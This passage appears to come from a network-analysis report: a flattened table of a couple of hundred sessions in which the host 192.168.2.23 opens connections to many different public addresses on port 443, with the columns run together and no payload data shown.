                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17063192.168.2.233781277.169.121.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17064192.168.2.2348664164.180.255.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17065192.168.2.2339670137.3.180.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17066192.168.2.2357300211.86.144.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17067192.168.2.2347894159.153.126.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17068192.168.2.2359974209.100.105.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17069192.168.2.2351734115.232.206.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17070192.168.2.2335408176.83.247.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17071192.168.2.2351630121.116.217.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17072192.168.2.234831087.17.43.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17073192.168.2.234802498.5.40.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17074192.168.2.23484761.106.65.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17075192.168.2.2335166101.68.83.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17076192.168.2.234012812.14.221.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17077192.168.2.2356010173.239.217.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17078192.168.2.235665424.203.132.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17079192.168.2.234567031.178.138.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17080192.168.2.2335648210.194.41.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17081192.168.2.2353730169.141.142.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17082192.168.2.2333064222.49.9.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17083192.168.2.2335092125.174.232.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17084192.168.2.2335434123.243.174.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17085192.168.2.2342570200.62.45.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17086192.168.2.235764883.202.72.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17087192.168.2.2336020151.221.238.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17088192.168.2.2343020209.181.237.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17089192.168.2.2356196121.51.72.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17090192.168.2.2346698100.40.246.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17091192.168.2.2345642153.192.13.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17092192.168.2.233409662.121.12.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17093192.168.2.234274850.222.32.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17094192.168.2.2354898125.18.149.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17095192.168.2.2332806190.82.27.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17096192.168.2.2333456160.36.159.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17097192.168.2.235556496.68.157.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17098192.168.2.2342332191.121.106.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17099192.168.2.2344476203.151.129.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17100192.168.2.235475472.211.144.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17101192.168.2.2339390209.22.9.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17102192.168.2.235925217.199.14.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17103192.168.2.234462670.78.168.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17104192.168.2.23507421.201.252.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17105192.168.2.2344160165.217.109.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17106192.168.2.2353422219.238.71.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17107192.168.2.2345900125.228.61.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17108192.168.2.234466446.150.110.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17109192.168.2.235029417.152.38.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17110192.168.2.2348434148.147.220.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17111192.168.2.23448729.191.15.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17112192.168.2.2335586218.101.24.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17113192.168.2.233721637.119.140.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17114192.168.2.2350566165.255.90.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17115192.168.2.234594882.88.59.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17116192.168.2.233803498.161.180.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17117192.168.2.2344932104.90.21.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17118192.168.2.2352410211.179.50.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17119192.168.2.234543640.81.32.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17120192.168.2.2342702178.209.126.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17121192.168.2.2336030204.106.151.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17122192.168.2.2333420148.15.229.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17123192.168.2.2334282105.205.57.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17124192.168.2.2351984153.125.33.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17125192.168.2.2351798144.202.255.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17126192.168.2.2338576207.154.169.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17127192.168.2.233519695.77.68.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17128192.168.2.2360254165.245.146.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17129192.168.2.234644076.52.85.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17130192.168.2.234513035.189.178.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17131192.168.2.2343014190.226.34.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17132192.168.2.236066081.246.194.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17133192.168.2.234073840.206.10.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17134192.168.2.233304872.209.174.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17135192.168.2.2352816187.105.241.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17136192.168.2.233573091.1.134.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17137192.168.2.2334370168.176.242.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17138192.168.2.234344018.30.246.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17139192.168.2.235584482.134.8.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17140192.168.2.233613489.117.128.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17141192.168.2.233972461.28.227.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17142192.168.2.235193612.255.240.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17143192.168.2.2347624213.182.171.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17144192.168.2.235608293.171.143.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17145192.168.2.233469424.29.93.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17146192.168.2.233436499.101.23.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17147192.168.2.2334628170.133.78.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17148192.168.2.2342586180.195.61.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17149192.168.2.23583888.45.239.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17150192.168.2.2358240217.221.156.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17151192.168.2.2341796220.228.131.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17152192.168.2.234934867.221.216.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17153192.168.2.234613684.203.207.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17154192.168.2.2345376209.234.151.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17155192.168.2.234229813.219.235.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17156192.168.2.233354062.187.188.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17157192.168.2.235876051.169.50.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17158192.168.2.234384036.9.122.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17159192.168.2.2340442174.21.30.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17160192.168.2.2347424125.40.165.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17161192.168.2.235656673.86.105.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17162192.168.2.2333898185.81.33.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17163192.168.2.23401268.159.69.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17164192.168.2.2342870185.196.7.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17165192.168.2.235252268.12.253.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17166192.168.2.234839635.181.133.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17167192.168.2.2355186177.101.166.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17168192.168.2.233939894.5.16.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17169192.168.2.2338356138.128.243.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17170192.168.2.2340802120.27.132.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17171192.168.2.2346218146.49.79.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17172192.168.2.2354254142.178.159.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17173192.168.2.234846062.226.87.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17174192.168.2.2353412157.83.42.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17175192.168.2.233860473.36.215.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17176192.168.2.2350028138.78.166.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17177192.168.2.2333408176.43.4.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17178192.168.2.235502897.253.89.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17179192.168.2.234471444.251.162.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17180192.168.2.2342292200.9.136.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17181192.168.2.234561034.227.19.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17182192.168.2.2337594148.129.167.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17183192.168.2.2347954122.243.95.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17184192.168.2.2332912145.66.59.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17185192.168.2.234726068.167.18.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17186192.168.2.233561482.101.224.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17187192.168.2.2345098184.123.159.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17188192.168.2.233626473.158.227.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17189192.168.2.2345782101.23.52.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17190192.168.2.2354062150.235.171.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17191192.168.2.234442096.186.228.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192192.168.2.2340140188.200.87.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17193192.168.2.235924242.87.209.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17194192.168.2.23577482.46.56.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17195192.168.2.234275874.228.147.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17196192.168.2.2337750157.186.94.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17197192.168.2.2348268114.84.76.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17198192.168.2.2342066208.75.144.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17199192.168.2.235656889.5.187.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17200192.168.2.2358552192.92.14.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17201192.168.2.2342192157.213.254.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17202192.168.2.234404698.72.48.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17203192.168.2.2351160184.46.20.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17204192.168.2.2346126167.215.72.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17205192.168.2.2338212102.234.196.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17206192.168.2.233501468.80.241.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17207192.168.2.2335626169.0.30.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17208192.168.2.234109819.198.130.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17209192.168.2.235097063.240.30.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17210192.168.2.235976090.119.178.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17211192.168.2.235250671.53.83.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17212192.168.2.2347034212.165.247.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17213192.168.2.233286059.53.92.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17214192.168.2.23457045.23.186.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17215192.168.2.2354730130.3.28.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17216192.168.2.2355076105.193.197.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17217192.168.2.233494266.113.231.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17218192.168.2.234923497.26.216.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17219192.168.2.2343346117.7.254.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17220192.168.2.2360020186.153.13.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17221192.168.2.2355668156.144.250.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17222192.168.2.2351590105.244.244.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17223192.168.2.23414104.215.239.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17224192.168.2.2357772184.203.44.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17225192.168.2.23439141.209.19.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17226192.168.2.2340888104.143.216.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17227192.168.2.234260624.151.31.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17228192.168.2.2348588122.85.193.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17229192.168.2.2347166187.28.235.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17230192.168.2.234794446.43.231.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17231192.168.2.2345008202.142.229.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17232192.168.2.234680884.102.206.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17233192.168.2.23516621.163.8.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17234192.168.2.234131057.147.207.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17235192.168.2.2356780199.63.222.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17236192.168.2.2359092196.19.241.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17237192.168.2.2339428152.198.81.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17238192.168.2.233806474.110.135.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17239192.168.2.2357076208.237.116.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17240192.168.2.2341860200.133.98.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17241192.168.2.235273874.124.156.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17242192.168.2.2338306148.182.19.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17243192.168.2.236053263.39.27.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17244192.168.2.2335810216.36.75.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17245192.168.2.2337460114.156.77.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17246192.168.2.235046865.253.66.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17247192.168.2.2348150189.106.95.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17248192.168.2.234301671.124.208.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17249192.168.2.234393663.130.13.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17250192.168.2.235094024.232.157.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17251192.168.2.234798051.122.133.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17252192.168.2.235600831.102.19.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17253192.168.2.2347000207.202.144.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17254192.168.2.2351038120.87.81.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17255192.168.2.233829849.252.102.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17256192.168.2.2350982117.15.100.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17257192.168.2.2336668171.27.183.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17258192.168.2.234571690.158.74.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17259192.168.2.2359620129.240.14.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17260192.168.2.233553493.96.73.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17261192.168.2.2341756219.143.24.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17262192.168.2.2338780166.144.70.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17263192.168.2.2360742140.189.228.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17264192.168.2.233313688.38.25.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17265192.168.2.2351884203.122.23.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17266192.168.2.2360150100.217.75.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17267192.168.2.2356654106.253.171.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17268192.168.2.2349598211.140.19.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17269192.168.2.2356190178.40.197.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17270192.168.2.234054859.221.226.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17271192.168.2.234802223.202.61.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17272192.168.2.2348942114.208.218.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17273192.168.2.234957275.205.203.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17274192.168.2.2345928100.201.98.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17275192.168.2.235996870.234.23.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17276192.168.2.2355806158.41.194.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17277192.168.2.235881699.46.82.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17278192.168.2.234940044.240.40.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17279192.168.2.2350402171.197.0.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17280192.168.2.2352360121.14.2.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17281192.168.2.2352484202.79.167.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17282192.168.2.2336138112.55.129.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17283192.168.2.2346532134.105.205.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17284192.168.2.233520043.245.14.120443
